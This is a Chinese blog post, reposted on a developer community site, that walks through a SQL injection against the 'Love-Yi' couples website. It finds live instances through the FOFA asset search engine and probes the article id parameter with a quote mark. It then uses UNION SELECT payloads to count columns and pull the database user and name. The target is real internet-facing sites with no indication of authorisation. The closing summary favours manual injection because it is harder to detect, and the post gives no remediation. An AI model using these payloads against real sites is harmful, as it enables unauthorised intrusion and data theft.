前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Love-Yi情侣网站存在sql注入漏洞

Love-Yi情侣网站存在sql注入漏洞

作者头像
小羽网安
发布2024-06-04 12:06:29
3780
发布2024-06-04 12:06:29
举报
文章被收录于专栏:web安全

FOFA介绍

部署在互联网上的网络设备资产信息搜索引擎。旨在尽可能多的对全球IT设备资产进行信息收集、 漏洞扫描, 进而开展资产影响分析、漏洞影响分析, 为相关流行态势感知分析提供依据。

网址: https://fofa.info/

添加描述

漏洞复现

搜索 love-yi 再找到国内站点,访问速度快一点,提高渗透效率

添加描述

love-yi是一个记录情侣日常的恋爱网站,经某位程序员修改和设计之后,使其更加美观好看,适合哄女朋友开心,或者留作纪念。

添加描述

找到点点滴滴下的文章

添加描述

文章详细页面

添加描述

查看url,包含了一个id

添加描述

尝试注入 添加一个 '

代码语言:javascript
复制
?id=6'

复制

查看源码,报错,存在sql注入漏洞

添加描述

注入payload

代码语言:javascript
复制
?id=6' union select 1,2,3,4 -- qwe

复制

还是报错,而且文章内容也没了,说明该表字段不含4列,尝试5列

添加描述

代码语言:javascript
复制
?id=6' union select 1,2,3,4,5 -- qwe

复制

正常显示,说明该表包含5个字段

添加描述

这里使用的union联结查询,他通常需要具备三个条件

  • • 选择的列数在两个查询中都是相同的。
  • • 数据类型在两个查询中都是兼容的。
  • 第一个查询(即原始查询)不返回任何结果,或者你知道如何绕过它(例如,通过使WHERE子句始终为)。

第三点中提到了原始查询不返回任何结果,得到payload

代码语言:javascript
复制
?id=-6' union select 1,2,3,4,5 -- qwe

复制

添加描述

注入成功,将2修改为如下payload

代码语言:javascript
复制
//拼接数据库版本,当前用户
concat(user(),database())

复制

添加描述

总结

由于作者更喜欢手工注入,因为手工注入更不容易被发现,灵活性,但是技术要求比较高,也比较耗时,使用SQL注入工具可以提高攻击效率和成功率,但也存在易被发现、受安全设备限制、需要特定环境、可能引发误报以及依赖工具更新等缺点。

发布者:小羽网安,转载请注明出处:https://mp.weixin.qq.com/s/MC1B1QInBtVlYiso0BMMMw

原文链接:https://mp.weixin.qq.com/s/MC1B1QInBtVlYiso0BMMMw

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • FOFA介绍
  • 漏洞复现
    • 总结
    相关产品与服务
    脆弱性检测服务
    脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档